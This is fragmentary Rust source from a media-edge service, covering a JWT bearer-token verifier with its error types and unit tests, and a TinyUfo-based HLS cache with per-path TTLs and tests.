current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 = self._build_prompt(goal,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REASON: Get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self._generate_response(prompt)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thought, action, action_input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thought, action, action_input = self._parse_response(response)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step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 = ReActStep(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iteration=iteration,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thought=thought,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action_input=action_input,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observation=None,  # Will be filled after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for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action == "Final Answer":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steps.append(step)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ReActResult(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final_answer=action_input.get("answer")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isinstance(action_input,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 action_input,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total_iterations=iteration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termination_reason="goal_achieved",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ACT: Execute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observation = self._execute_tool(action, action_input)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step.observation =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step.observation = f"Error executing {action}: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steps.append(step)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world model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self._update_world_model(step)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Max iterations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ReActResult(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final_answer=None,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total_iterations=iteration,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termination_reason="max_iterations",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ReActResult(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final_answer=None,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total_iterations=iteration,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termination_reason="error",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_build_prompt(self, goal: str, previous_steps: list[ReActStep])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ReAct prompt with goal, tools, world model state, and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previous_steps: Previous ReAct steps in this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tool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tool_descriptions =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[f"- {name}: {func.__doc__ or 'No description'}" for name, func in self.tools.items()],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previous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previous_steps[-5:]:  # Show last 5 steps to avoid context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steps_text += f"\nThought: {step.thought}\n"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steps_text += f"Action: {step.action}\n"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steps_text += f"Action Input: {json.dumps(step.action_input)}\n"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step.observation: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steps_text += f"Observation: {step.observation}\n"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world model summary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world_model_summary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self.world_model.get_summary()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world_model_summary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Phase: {summary["phase"]}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Hypotheses: {summary["num_hypotheses"]} ({summary["num_tested_hypotheses"]}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results: {summary["num_analysis_results"]}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Literature refs: {summary["num_literature_refs"]}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{chr(10).join(["  - " + h["text"] + f" (confidence: {h['confidence']:.2f})" for h in summary["top_hypotheses"]])}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self.REACT_PROMPT_TEMPLATE.format(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goal=goal,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tool_descriptions=tool_descriptions,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world_model_summary=world_model_summary,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previous_steps=steps_text or "[No previous steps]",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_generate_response(self,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LLM response using Vertex AI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Formatted ReAct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 response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will be implemented with actual Vertex AI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returns a placeholder that will be replaced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when vertex_client.py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self.temperature,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"max_output_tokens":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RuntimeError(f"LLM generation failed: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_parse_response(self, response: str) -&gt; tuple[str, str | None, Any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LLM response to extract Thought, Action, Action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Raw LLM response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(thought, action, action_input)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thought_match = re.search(r"Thought:\s*(.+?)(?=\nAction:|\n*$)", response,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thought = thought_match.group(1).strip() if thought_match else response.strip()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action_match = re.search(r"Action:\s*(.+?)(?=\nAction Input:|\n|$)",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action_match.group(1).strip() if action_match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Action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action_input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input_match = re.search(r"Action Input:\s*(.+?)(?=\n\n|\n*$)", response,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input_text = input_match.group(1).strip()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to parse as JSON, fall back to raw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action_input = json.loads(input_text)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action_input = input_text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thought, action, action_input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_execute_tool(self, action: str, action_input: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tool and return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action: Tool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action_input: Tool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execution result as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not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Unknown tool '{action}'. Available tools: {list(self.tools.keys())}"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tool_func = self.tools[action]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tool with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isinstance(action_input,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tool_func(**action_input)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tool_func(action_input)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result to string for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isinstance(result,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isinstance(result, (dict, list)):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json.dumps(result,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f"Tool execution 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_update_world_model(self, step: ReActStep):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world model based on ReAct step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where we bridge ReAct loop outputs to world model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Extracts structured information from observations and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hypotheses, analysis results,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step: Completed ReAct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Example: if action was "generate_hypothesis", add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step.action == "generate_hypothesis" and step.observation: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hypothesis from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(This is simplified - actual implementation would parse structured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self.world_model.add_hypothesis(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text=str(step.action_input.get("hypothesis_text", step.observation)),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confidence=step.action_input.get("confidence",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Example: if action was "run_analysis", add result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step.action == "run_analysis" and step.observation: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self.world_model.add_analysis_result(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code=step.action_input.get("code",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outputs=[step.observation],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hypothesis_id=step.action_input.get("hypothesis_id"),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More sophisticated parsing would happen in real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based on specific tool outputs and world model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get_tool_description(self, tool_name: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formatted description of a tool for prompting."""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tool_name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self.tools[tool_name].__doc__ or "No description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 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add_tool(self, name: str, func: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new tool to the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 name (will be used in Action: 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Callable tool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self.tools[name] =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remove_tool(self,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 tool from the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name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self.tools[name]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f"ReActOrchestrator(tools={list(self.tools.keys())},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f"max_iterations={self.max_iterations},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f"has_world_model={self.world_model is not None})"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apps/aiyou_stack/aiyou-fastapi-services/kosmos/core/vertex_client.py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"""Vertex AI Gemini Client: Wrapper for Google Vertex AI generative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cost tracking, model selection logic, and error handling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2.5 Pro and Flash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GenerationConfig, GenerativeModel, Part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vertexai.preview.generative_models import FunctionDeclaration,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ImportError(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"Vertex AI SDK not installed. Install with: pip install google-cloud-aiplatform",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GeminiModel(Enum):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Gemini models with cost characteristics."""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"gemini-3.1-flash-lite-preview"  # Fast, cheap - upgraded to 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"gemini-3.1-flash-lite-preview"  # Deep reasoning (using 1.5 until 2.5 GA)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cost_per_1m_input(self)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"""Cost per 1M input tokens in USD."""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GeminiModel.FLASH: 0.075,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GeminiModel.PRO: 1.25,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costs[self]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cost_per_1m_output(self)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"""Cost per 1M output tokens in USD."""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GeminiModel.FLASH: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GeminiModel.PRO: 5.00,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costs[self]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model generation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self.text,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"input_tokens": self.input_tokens,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"output_tokens": self.output_tokens,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self.cost,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"finish_reason": self.finish_reason,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VertexAIClient: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Vertex AI Gemini models with cost tracking and smart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model selection based on context size and task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counting and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handling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Support for function calling (tools)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default_model: GeminiModel = GeminiModel.PRO,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cost_tracker: Any | None = None,  # CostMonitor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GCP region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default_model: Default Gemini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cost_tracker: Optional CostMonitor for budget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self.default_model = default_model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self.cost_tracker = cost_tracker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Vertex AI client for project {project_id} in {location}")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self._models: dict[str, GenerativeModel]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GeminiModel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list[FunctionDeclaration]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GenerativeModel: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a Gemini model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Gemini model type (defaults to client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 Optional list of function declarations for tool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GenerativeModel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model or self.default_model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 = model.value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cache key based on model and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f"{model_name}_{hash(tuple(tools) if tools else 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cache_key not in self._models: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self._models[cache_key]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tools=[Tool(function_declarations=tools)],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self._models[cache_key]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logger.debug(f"Created new model instance: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self._models[cache_key]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GeminiModel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max_output_tokens: int =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list[FunctionDeclaration]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text using Gemini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Gemini model to use (defaults to client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max_output_tokens: Maximum tokens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 Optional function declarations for tool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generation config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GenerationResult with text, tokens, and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RuntimeError: If generation fails after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model or self.default_model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gemini_model = self.get_model(model,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input tokens (rough approximation: 1 token ≈ 4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estimated_input_tokens = len(prompt)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budget if cost tracker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self.cost_tracker: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 = self._estimate_cost(estimated_input_tokens, max_output_tokens,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self.cost_tracker.check_budget(estimated_cost)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 = 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max_output_tokens=max_output_tokens,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gemini_model.generate_content(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generation_config=generation_config,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response.text if hasattr(response, "text") else str(response)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token counts from metadata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estimated_input_tokens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len(text) // 4  # Rough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get actual token counts from usage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hasattr(response, "usage_metadata"):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 = response.usage_metadata.prompt_token_count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 = response.usage_metadata.candidates_token_count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actual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self._calculate_cost(input_tokens, output_tokens,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usage if cost tracker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self.cost_tracker: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self.cost_tracker.record_usage(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input_tokens +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f"Generated {output_tokens} tokens with {model.value}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f"(cost: ${cost:.4f}, input: {input_tokens} tokens)",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GenerationResult(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finish_reason=getattr(response.candidates[0], "finish_reason",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hasattr(response, "candidates")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logger.error(f"Generation failed with {model.value}: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RuntimeError(f"Gemini generation failed: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generate_with_auto_routing(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context_length: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complexity: str =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automatic model selection based on context and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Flash: Short context (&lt;5k tokens) + low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Pro: Long context (&gt;5k tokens) OR high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context_length: Optional explicit context length (auto-estimated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complexity: Task complexity ("low", "medium", "high")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generation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context length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context_length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context_length = len(prompt)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model based on routing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context_length &lt; 5000 and complexity == "low":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GeminiModel.FLASH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logger.debug("Auto-routing: Selected Flash (short context, low complexity)")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GeminiModel.PRO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f"Auto-routing: Selected Pro (context={context_length}, complexity={complexity})",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self.generate(prompt, model=model,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_estimate_cost(self, input_tokens: int, output_tokens: int, model: GeminiModel)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for a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input_tokens: Estimated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output_tokens: Expected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Gemini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input_cost = (input_tokens / 1_000_000) * model.cost_per_1m_input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output_cost = (output_tokens / 1_000_000) * model.cost_per_1m_output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input_cost + output_cost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_calculate_cost(self, input_tokens: int, output_tokens: int, model: GeminiModel)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actual cost from token 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input_tokens: Actual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output_tokens: Actual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Gemini model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self._estimate_cost(input_tokens, output_tokens,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create_function_declaration(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FunctionDeclaration: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function declaration for tool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Function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Function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parameters: JSON schema for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FunctionDeclaration for use with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client.create_function_declaration(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name="search_papers",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description="Search academic papers by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    "query": {"type": "string", "description": "Search query"},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    "limit": {"type": "integer", "description": "Max results"},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    "required": ["query"],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FunctionDeclaration(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f"VertexAIClient(project={self.project_id}, location={self.location},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f"default_model={self.default_model.value})"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apps/aiyou_stack/aiyou-fastapi-services/kosmos/core/vertex_client.py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apps/aiyou_stack/aiyou-fastapi-services/kosmos/core/world_model.py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"""World Model: Persistent state tracking across autonomous discovery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'structured world-model' concept from Kosmos paper (arxiv 2511.02824).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Maintains hypotheses, analysis results, literature references, and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across multi-phase research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networkx as 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WorkflowPhase(Enum):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"""Kosmos workflow phases for autonomous research cycles."""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 = "ingest"  # Load datasets, initial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EXPLORE = "explore"  # Data exploration, pattern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HYPOTHESIZE = "hypothesize"  # Generate candidate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= "test"  # Design &amp; execute experiments/analysis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 = "validate"  # Statistical validation, literature cross-check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 = "synthesize"  # Write final report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testable research hypothesis generated during discovery."""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supporting_evidence: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test_results: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d["created_at"] = self.created_at.isoformat()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isinstance(data["created_at"],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data["created_at"] = datetime.fromisoformat(data["created_at"])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data analysis or experiment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plots: list[str] = field(default_factory=list)  # Cloud Storage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statistical_tests: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d["executed_at"] = self.executed_at.isoformat()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isinstance(data["executed_at"],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data["executed_at"] = datetime.fromisoformat(data["executed_at"])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LiteratureRef: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"""Reference to academic literature discovered during research."""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citations_extracted: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d["added_at"] = self.added_at.isoformat()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LiteratureRef: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isinstance(data["added_at"],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data["added_at"] = datetime.fromisoformat(data["added_at"])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"""Persistent state management for Kosmos-pattern autonomous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Research hypotheses with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Analysis results and experimental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Literature references and citation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Knowledge graph of entities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workflow phase and progress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'world model' that coordinates across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 analysis, literature search, hypothesis generation, synthesis).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session_id: str, goal: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 new world model for a research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Unique identifier for this research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goal: High-level research goal/question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self.goal =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self.hypotheses: list[Hypothesis]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self.analysis_results: list[AnalysisResult]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self.literature_refs: list[LiteratureRef]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Knowledge graph: nodes = entities, edges =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 = nx.DiGraph()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Workflow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 = WorkflowPhase.INGEST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self.status: str = "initialized"  # initialized, running, completed,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new research hypothesis to the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Hypothesis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Initial confidence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evidence: Supporting evidence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Hypothesis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id=f"hyp_{len(self.hypotheses) + 1:03d}",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supporting_evidence=evidence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self.hypotheses.append(hypothesis)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add_analysis_result(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an analysis result to the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Analysis code that was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outputs: Text outputs from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hypothesis_id: Associated hypothesis (if testing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fields (plots, statistical_tests,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AnalysisResult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AnalysisResult(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id=f"result_{len(self.analysis_results) + 1:03d}",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outputs=outputs,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add_literature(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LiteratureRef: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literature reference to the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Paper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authors: List of author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abstract: Paper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relevance_score: Relevance to current research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fields (url, citations_extracted,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LiteratureRef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LiteratureRef(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id=f"lit_{len(self.literature_refs) + 1:03d}",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relevance_score=relevance_score,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self.literature_refs.append(ref)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update_phase(self, new_phase: WorkflowPhase, reason: str =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"""Transition to a new workflow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new_phase: Target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Explanation for phase transition (for observability)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self.phase_history.append(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"from_phase": self.phase.value,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"to_phase": new_phase.value,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self.phase = new_phase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add_knowledge(self, entity: str, entity_type: str = "concept", **attributes):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an entity to the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entity: Entity name/ID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entity_type: Type of entity (concept, dataset, variable,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**attributes: Additional node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self.knowledge_graph.add_node(entity, type=entity_type, **attributes)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add_relationship(self, source: str, target: str, relation: str, **attributes):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relationship to the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Source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Target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relation: Relationship type (causes, correlates_with, derived_from,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**attributes: Additional edge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self.knowledge_graph.add_edge(source, target, relation=relation, **attributes)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get_hypothesis(self, hypothesis_id: str) -&gt; Hypothesis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 hypothesis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 in self.hypotheses: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h.id == hypothesis_id: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update_hypothesis_confidence(self, hypothesis_id: str, new_confidence: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confidence score for a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 = self.get_hypothesis(hypothesis_id)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hyp.confidence = new_confidence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get_top_hypotheses(self, k: int = 5)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top-k hypotheses by confidence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sorted(self.hypotheses, key=lambda h: h.confidence, reverse=True)[:k]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get_untested_hypotheses(self)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hypotheses that haven't been tested yet."""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[h for h in self.hypotheses if not h.tested]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record_cost(self, tokens: int, model: str, cost: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token usage and cost for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tokens: Number of tokens consumed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name (gemini-3.1-flash-lite-preview, gemini-3.1-flash-lite-preview)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cost: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 +=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self.total_cost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summary of the current world model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key metrics and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"goal": self.goal,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self.phase.value,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"num_hypotheses": len(self.hypotheses),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"num_tested_hypotheses": sum(1 for h in self.hypotheses if h.tested),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"num_analysis_results": len(self.analysis_results),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"num_literature_refs": len(self.literature_refs),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"knowledge_graph_nodes": self.knowledge_graph.number_of_nodes(),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"knowledge_graph_edges": self.knowledge_graph.number_of_edges(),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self.total_cost,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self.total_tokens,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h.id, "text": h.text, "confidence": h.confidence}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h in self.get_top_hypotheses(3)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world model to dictionary for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representation suitable for Firestore/JSON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"goal": self.goal,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self.phase.value,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"phase_history": self.phase_history,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"hypotheses": [h.to_dict() for h in self.hypotheses],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"analysis_results": [r.to_dict() for r in self.analysis_results],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"literature_refs": [ref.to_dict() for ref in self.literature_refs],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"knowledge_graph": nx.node_link_data(self.knowledge_graph),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self.total_cost,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self.total_tokens,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KosmosWorldModel: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"""Deserialize world model from dictionary.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Dictionary from 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Reconstructed KosmosWorldModel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cls(session_id=data["session_id"], goal=data["goal"])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model.created_at = datetime.fromisoformat(data["created_at"])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model.status = data["status"]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model.phase = WorkflowPhase(data["phase"])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model.phase_history = data["phase_history"]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model.total_cost = data["total_cost"]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model.total_tokens = data["total_tokens"]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model.hypotheses = [Hypothesis.from_dict(h) for h in data["hypotheses"]]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model.analysis_results = [AnalysisResult.from_dict(r) for r in data["analysis_results"]]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model.literature_refs = [LiteratureRef.from_dict(ref) for ref in data["literature_refs"]]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model.knowledge_graph = nx.node_link_graph(data["knowledge_graph"])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f"KosmosWorldModel(session={self.session_id}, phase={self.phase.value},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f"hypotheses={len(self.hypotheses)}, status={self.status})"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apps/aiyou_stack/aiyou-fastapi-services/kosmos/core/world_model.py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apps/aiyou_stack/aiyou-fastapi-services/kosmos/observability/__init__.py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"""Observability and monitoring components for Kosmos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kosmos.observability.agentops_integration import AgentOpsTracker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kosmos.observability.cost_monitor import CostMonitor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kosmos.observability.telemetry import get_tracer, setup_telemetry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"AgentOpsTracker",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"get_tracer",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"setup_telemetry",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apps/aiyou_stack/aiyou-fastapi-services/kosmos/observability/__init__.py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apps/aiyou_stack/aiyou-fastapi-services/kosmos/observability/agentops_integration.py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"""AgentOps Integration: Full observability for autonomous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tracking across multi-cycle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recording for thoughts, actions,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 and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 and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Trace hierarchy for complex agent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AGENTOPS_AVAILABLE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AGENTOPS_AVAILABLE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logging.warning("AgentOps SDK not installed. Install with: pip install agentops")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kosmos.core.orchestrator import ReActResult, ReActStep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AgentOps session for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session_obj: Any | None = None  # AgentOps session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AgentOpsTracker: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"""AgentOps integration for Kosmos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Multi-agent sessions across workflow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Individual ReAct cycles with thought/action/observation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usage and cost per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Success/failure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Long-horizon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auto_start_session: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AgentOps tracker.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AgentOps API key (reads from AGENTOPS_API_KEY env var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auto_start_session: Whether to auto-start a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Default tags for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AGENTOPS_AVAILABLE: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logger.warning("AgentOps not available - tracking will be no-op")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os.getenv("AGENTOPS_API_KEY")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AgentOps API key provided - tracking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agentops.init(api_key=self.api_key, auto_start_session=auto_start_session)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logger.info("AgentOps tracker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self.default_tags = tags or ["kosmos", "autonomous-agent"]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self.current_session: AgentSession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AgentOps session for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goal: Research goal/task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agent_name: Name of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Optional explicit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Additional tags for this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"no-op"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all_tags = self.default_tags + (tags or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all_tags.append(agent_name)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AgentOps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session_obj = agentops.start_session(tags=all_tags)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self.current_session = AgentSession(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str(session_obj.session_id if hasattr(session_obj, "session_id") else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goal=goal,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tags=all_tags,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session_obj=session_obj,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session start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event_type="session_start",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"goal": goal,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"agent": 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all_tags,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logger.info(f"Started AgentOps session: {self.current_session.session_id}")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self.current_session.session_id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end_session(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str =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final_output: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 the current AgentOps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Session result ("success", "failure", "timeout")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final_output: Optional final output/answer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 or not self.current_session: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event_type="session_end",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"final_output": final_output,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datetime.utcnow() - self.current_session.started_at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End AgentOps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agentops.end_session(result)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f"Ended AgentOps session: {self.current_session.session_id} with result: {result}",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self.current_session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record_thought(self, iteration: int, thought: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reasoning thought from ReAct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iteration: Loop iteration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thought: Thought/reasoning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"thought": thought,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action_input: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an action (tool invocation) from ReAct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iteration: Loop iteration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action: Tool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action_input: Tool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"action_input": action_input,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record_observation(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an observation (tool result) from ReAct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iteration: Loop iteration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observation: Tool result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tokens: Optional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cost: Optional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event_type="observation",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"observation": observation[:1000],  # Truncate long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"observation_length": len(observation),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"tokens": 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record_react_step(self, step: ReActStep, cost: float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complete ReAct step (thought + action + observation).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step: ReActStep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cost: Optional cost for this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self.record_thought(step.iteration, step.thought)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step.action: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self.record_action(step.iteration, step.action, step.action_input)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step.observation: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self.record_observation(step.iteration, step.observation, cost=cost)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record_react_result(self, result: ReActResult):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complete ReAct cycle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ReActResult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event_type="react_cycle_complete",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result.success,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"total_iterations": result.total_iterations,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"termination_reason": result.termination_reason,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"has_final_answer": result.final_answer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result.error,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custom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event_type: Type of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Event data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agentops.record(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agentops.Event(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**data,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record AgentOps event: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an error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Error type/category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error_message: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error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"error_type": error_type,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"error_message": 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 manager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 manager exit - end session on exit."""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"failure" if exc_type else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self.end_session(result=result)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f"AgentOpsTracker(enabled={self.enabled},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f"current_session={self.current_session.session_id if self.current_session else None})"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apps/aiyou_stack/aiyou-fastapi-services/kosmos/observability/agentops_integration.py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apps/aiyou_stack/aiyou-fastapi-services/kosmos/observability/cost_monitor.py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"""Cost Monitor: Budget tracking and alerts for LLM inference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cost tracking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Daily/monthly budget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thresholds and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logging for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LLM usage and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BudgetExceededError(Exception):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budget limit would be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"""Monitor and control LLM inference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usage across sessions and enforces budget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cost estimation and alerting.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model pricing (per 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"gemini-3.1-flash-lite-preview": {"input": 0.075, "output": 0.30},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daily_budget: float = 2000.0,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monthly_budget: float = 60000.0,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alert_threshold: float = 0.8,  # Alert at 80% of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session_budget: float | None = 500.0,  # Max cost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cost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daily_budget: Daily budget limit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monthly_budget: Monthly budget limit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alert_threshold: Fraction of budget to trigger alert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session_budget: Optional per-session budget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self.daily_budget = daily_budget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self.monthly_budget = monthly_budget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self.alert_threshold = alert_threshold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self.session_budget = session_budget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self.usage_records: list[UsageRecord]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self.session_costs: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Budget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self.daily_burn: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self.monthly_burn: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self.last_reset_date: datetime = datetime.utcnow().date()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self.last_reset_month: int = datetime.utcnow().month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f"CostMonitor initialized: daily=${daily_budget:.2f},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f"monthly=${monthly_budget:.2f}, session=${session_budget:.2f}",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check_budget(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 operation would exceed budget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estimated_cost: Estimated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Optional session ID for per-session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within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BudgetExceededError: If budget would be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self._reset_if_needed()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daily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self.daily_burn + estimated_cost &gt; self.daily_budget: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BudgetExceededError(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f"Operation would exceed daily budget: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f"${self.daily_burn:.2f} + ${estimated_cost:.2f} &gt; ${self.daily_budget:.2f}",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monthly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self.monthly_burn + estimated_cost &gt; self.monthly_budget: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BudgetExceededError(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f"Operation would exceed monthly budget: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f"${self.monthly_burn:.2f} + ${estimated_cost:.2f} &gt; ${self.monthly_budget:.2f}",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session budget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session_id and self.session_budget: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session_cost = self.session_costs.get(session_id,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session_cost + estimated_cost &gt; self.session_budget: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BudgetExceededError(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f"Operation would exceed session budget for {session_id}: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f"${session_cost:.2f} + ${estimated_cost:.2f} &gt; ${self.session_budget:.2f}",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alert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self.daily_burn + estimated_cost &gt; self.daily_budget * self.alert_threshold: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f"Approaching daily budget limit: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f"${self.daily_burn + estimated_cost:.2f} / ${self.daily_budget:.2f}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f"({(self.daily_burn + estimated_cost) / self.daily_budget * 100:.1f}%)",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self.monthly_burn + estimated_cost &gt; self.monthly_budget * self.alert_threshold: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f"Approaching monthly budget limit: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f"${self.monthly_burn + estimated_cost:.2f} / ${self.monthly_budget:.2f}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f"({(self.monthly_burn + estimated_cost) / self.monthly_budget * 100:.1f}%)",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agent_name: str =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actual usage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tokens: Total tokens consumed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cost: Actual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agent_name: Agent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input_tokens: Input tokens (optional, for detailed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output_tokens: Output tokens (optional, for detailed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self._reset_if_needed()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usage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UsageRecord(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input_tokens=input_tokens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output_tokens=output_tokens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self.usage_records.append(record)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burn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self.daily_burn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self.monthly_burn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session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self.session_costs[session_id] = self.session_costs.get(session_id, 0.0) +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f"Recorded usage: {tokens} tokens, ${cost:.4f} ({model})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f"[daily: ${self.daily_burn:.2f}, monthly: ${self.monthly_burn:.2f}]",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for a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input_tokens: Expected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output_tokens: Expected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 not in self.PRICING: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logger.warning(f"Unknown model {model}, using gemini-3.1-flash-lite-preview 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self.PRICING[model]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input_cost = (input_tokens / 1_000_000) * pricing["input"]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output_cost = (output_tokens / 1_000_000) * pricing["output"]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input_cost + output_cost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get_session_cost(self, session_id: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total cost for a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self.session_costs.get(session_id,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get_daily_burn(self)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daily burn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self._reset_if_needed()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self.daily_burn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get_monthly_burn(self)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monthly burn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self._reset_if_needed()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self.monthly_burn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get_budget_status(self)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budget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budget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self._reset_if_needed()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self.daily_budget,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"burned": self.daily_burn,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"remaining": self.daily_budget - self.daily_burn,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"utilization_pct": (self.daily_burn / self.daily_budget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self.daily_budget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self.monthly_budget,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"burned": self.monthly_burn,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"remaining": self.monthly_budget - self.monthly_burn,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"utilization_pct": (self.monthly_burn / self.monthly_budget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self.monthly_budget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"active_sessions": len(self.session_costs),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"total_session_cost": sum(self.session_costs.values()),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"top_sessions":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self.session_costs.items(),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)[:5],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"last_reset": self.last_reset_date.isoformat(),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get_usage_summary(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usage summary for a time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start_time: Start of period (default: 24 hours ago)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end_time: End of period (default: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 statistics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start_time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datetime.utcnow() -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end_time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period_records = [r for r in self.usage_records if start_time &lt;= r.timestamp &lt;= end_time]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period_records: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{"total_cost": 0.0, "total_tokens": 0, "num_requests":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sum(r.cost for r in period_records)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total_input_tokens = sum(r.input_tokens for r in period_records)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total_output_tokens = sum(r.output_tokens for r in period_records)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by_model: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record in period_records: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record.model not in by_model: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by_model[record.model]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by_model[record.model]["requests"]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by_model[record.model]["input_tokens"] += record.input_tokens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by_model[record.model]["output_tokens"] += record.output_tokens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by_model[record.model]["cost"] += record.cost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"period_start": start_time.isoformat(),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"period_end": end_time.isoformat(),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"total_input_tokens": total_input_tokens,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"total_output_tokens": total_output_tokens,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"num_requests": len(period_records),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"by_model": by_model,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_reset_if_needed(self):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daily/monthly counters if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now.date()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current_month = now.month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daily if new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today &gt; self.last_reset_date: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f"Daily budget reset: burned ${self.daily_burn:.2f} on {self.last_reset_date}",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self.daily_burn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self.last_reset_date =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monthly if new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current_month != self.last_reset_month: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budget reset: burned ${self.monthly_burn:.2f} in month {self.last_reset_month}",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self.monthly_burn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self.last_reset_month = current_month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f"CostMonitor(daily=${self.daily_burn:.2f}/${self.daily_budget:.2f},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f"monthly=${self.monthly_burn:.2f}/${self.monthly_budget:.2f})"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apps/aiyou_stack/aiyou-fastapi-services/kosmos/observability/cost_monitor.py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apps/aiyou_stack/aiyou-fastapi-services/kosmos/observability/telemetry.py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"""OpenTelemetry Integration: Cloud Trace integration for distributed tracing.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span creation for agent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Trace hierarchy for multi-agent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Google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attributes for agent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opentelemetry.exporter.cloud_trace import CloudTraceSpanExporter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opentelemetry.sdk.resources import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opentelemetry.sdk.trace.export import BatchSpanProcessor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OTEL_AVAILABLE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OTEL_AVAILABLE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"OpenTelemetry not installed.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"Install with: pip install opentelemetry-api opentelemetry-sdk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"opentelemetry-exporter-gcp-trace",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setup_telemetry(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service_name: str = "kosmos-agents",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enable_trace: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trace.Tracer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 up OpenTelemetry with Cloud Trace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service_name: Service name for trace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enable_trace: Whether to enable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 instance if successful,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OTEL_AVAILABLE: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logger.warning("OpenTelemetry not available - tracing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enable_trace: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logger.info("Tracing disabled by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resource with service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 = Resource.create(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"service.name":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"service.version":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tracer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tracer_provider = TracerProvider(resource=resource)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Cloud Trace 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cloud_trace_exporter = CloudTraceSpanExporter(project_id=project_id)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batch span processor for efficient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tracer_provider.add_span_processor(BatchSpanProcessor(cloud_trace_exporter))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as global tracer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trace.set_tracer_provider(tracer_provider)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logger.info(f"OpenTelemetry configured with Cloud Trace for project {project_id}")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trace.get_tracer(__name__)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setup telemetry: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get_tracer(name: str | None = None) -&gt; trace.Tracer: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tracer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Optional tracer name (defaults to module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OTEL_AVAILABLE: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no-op tracer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trace.get_tracer(name or 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trace.get_tracer(name or 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TracedOperation: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manager for tracing an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TracedOperation("agent_execution", agent="literature", goal="search papers"):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Perform agent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agent.execute_task(goal)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tracer: trace.Tracer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traced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operation_name: Name of the operation (span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tracer: Optional tracer instance (uses default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**attributes: Additional span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self.operation_name = operation_name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self.tracer = tracer or get_tracer()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self.attributes =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self.span: trace.Span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 -&gt; trace.Span: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span on context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OTEL_AVAILABLE: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self.span = self.tracer.start_span(self.operation_name)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self.span and hasattr(self.span, "set_attribute"):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self.attributes.items():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self.span.set_attribute(key,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logger.debug(f"Failed to set attribute {key}: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 span on context exit."""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self.span and hasattr(self.span, "end"):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exception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exc_type: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self.span.set_attribute("error",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self.span.set_attribute("error.type", exc_type.__name__)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self.span.set_attribute("error.message", str(exc_val))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trace_react_cycle(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tracer: trace.Tracer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callable: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"""Decorator for tracing ReAct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@trace_react_cycle()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execute_cycle(self, goal):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ReAct loop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tracer or get_tracer()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decorator(func):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wrapper(*args,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OTEL_AVAILABLE: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TracedOperation(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f"react_cycle.{func.__name__}",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tracer=tracer,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goal=kwargs.get("goal",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add_span_attributes(span: trace.Span | None, **attributes):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attributes to current span.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span: Span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**attributes: Attributes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OTEL_AVAILABLE or not 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hasattr(span, "set_attribute"):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attributes.items():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Convert complex types to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isinstance(value, (dict, list)):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 = str(value)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span.set_attribute(key,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logger.debug(f"Failed to set attribute {key}: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trace_agent_execution(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tracer: trace.Tracer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TracedOperation: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traced operation for agent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agent_name: Name of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tracer: Optional tracer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TracedOperation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TracedOperation(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tracer=tracer,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task=task[:200],  # Truncate long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trace_tool_invocation(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tool_input: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tracer: trace.Tracer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TracedOperation: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traced operation for tool invocation.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Name of the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tool_input: Tool input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tracer: Optional tracer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TracedOperation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TracedOperation(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"tool_invocation",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tracer=tracer,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tool_name=tool_name,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tool_input=str(tool_input)[:200],  # Truncate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apps/aiyou_stack/aiyou-fastapi-services/kosmos/observability/telemetry.py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apps/aiyou_stack/aiyou-fastapi-services/kosmos/persistence/__init__.py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"""Persistence layer for world model state and artifacts."""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kosmos.persistence.firestore_backend import FirestoreBackend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kosmos.persistence.storage_backend import CloudStorageBackend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"CloudStorageBackend",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"FirestoreBackend",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apps/aiyou_stack/aiyou-fastapi-services/kosmos/persistence/__init__.py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apps/aiyou_stack/aiyou-fastapi-services/kosmos/persistence/firestore_backend.py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"""Firestore Backend: Persistent storage for world model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serialization to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state persistence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Hypothesis, analysis, and literature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capabilities for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logging.warning("Firestore SDK not installed. Install with: pip install google-cloud-firestore")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kosmos.core.world_model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KosmosWorldModel,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"""Firestore persistence backend for world model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/sessions/{session_id}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metadata (goal, status, phase, timestamps,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/sessions/{session_id}/hypotheses/{hypothesis_id}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hypothesis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/sessions/{session_id}/analysis_results/{result_id}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analysis result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/sessions/{session_id}/literature/{lit_id}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literature reference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str = "(default)",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Firestore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database: Firestore database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FIRESTORE_AVAILABLE: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RuntimeError("Firestore SDK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firestore.Client(project=project_id, database=database)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logger.info(f"Firestore backend initialized for project {project_id}")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save_world_model(self, world_model: KosmosWorldModel):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complete world model state to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world_model: KosmosWorldModel instance to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world_model.session_id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session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session_ref = self.db.collection("sessions").document(session_id)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"goal": world_model.goal,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world_model.status,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world_model.phase.value,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"phase_history": world_model.phase_history,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world_model.created_at,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world_model.total_cost,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world_model.total_tokens,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"num_hypotheses": len(world_model.hypotheses),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"num_analysis_results": len(world_model.analysis_results),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"num_literature_refs": len(world_model.literature_refs),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session_ref.set(session_data,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hyp in world_model.hypotheses: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hyp_ref = session_ref.collection("hypotheses").document(hyp.id)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hyp_ref.set(hyp.to_dict(),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world_model.analysis_results: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result_ref = session_ref.collection("analysis_results").document(result.id)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result_ref.set(result.to_dict(),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literature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lit in world_model.literature_refs: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lit_ref = session_ref.collection("literature").document(lit.id)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lit_ref.set(lit.to_dict(),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f"Saved world model for session {session_id}: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f"{len(world_model.hypotheses)} hypotheses,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f"{len(world_model.analysis_results)} results,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f"{len(world_model.literature_refs)} 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load_world_model(self, session_id: str) -&gt; KosmosWorldModel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world model state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 to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KosmosWorldModel instance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session_ref = self.db.collection("sessions").document(session_id)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session_doc = session_ref.get()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session_doc.exists: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logger.warning(f"Session {session_id} not found in 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session_data = session_doc.to_dict()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world model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 = KosmosWorldModel(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goal=session_data["goal"],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world_model.status = session_data.get("status", "initialized")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world_model.created_at = session_data.get("created_at")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world_model.total_cost = session_data.get("total_cost",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world_model.total_tokens = session_data.get("total_tokens",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world_model.phase_history = session_data.get("phase_history",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hyp_docs = session_ref.collection("hypotheses").stream()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hyp_doc in hyp_docs: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hyp_data = hyp_doc.to_dict()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 = Hypothesis.from_dict(hyp_data)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world_model.hypotheses.append(hypothesis)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result_docs = session_ref.collection("analysis_results").stream()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result_doc in result_docs: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result_data = result_doc.to_dict()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analysis_result = AnalysisResult.from_dict(result_data)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world_model.analysis_results.append(analysis_result)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literature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lit_docs = session_ref.collection("literature").stream()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lit_doc in lit_docs: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lit_data = lit_doc.to_dict()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lit_ref = LiteratureRef.from_dict(lit_data)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world_model.literature_refs.append(lit_ref)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f"Loaded world model for session {session_id}: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f"{len(world_model.hypotheses)} hypotheses,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f"{len(world_model.analysis_results)} results,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f"{len(world_model.literature_refs)} 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list_sessions(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available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sessions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Optional status filter (e.g., "running", "completed")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session metadata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self.db.collection("sessions").limit(limit)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query.where("status", "==",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query.stream():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sessions.append(doc.to_dict())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delete_session(self, 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session and all its subcollections.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session_ref = 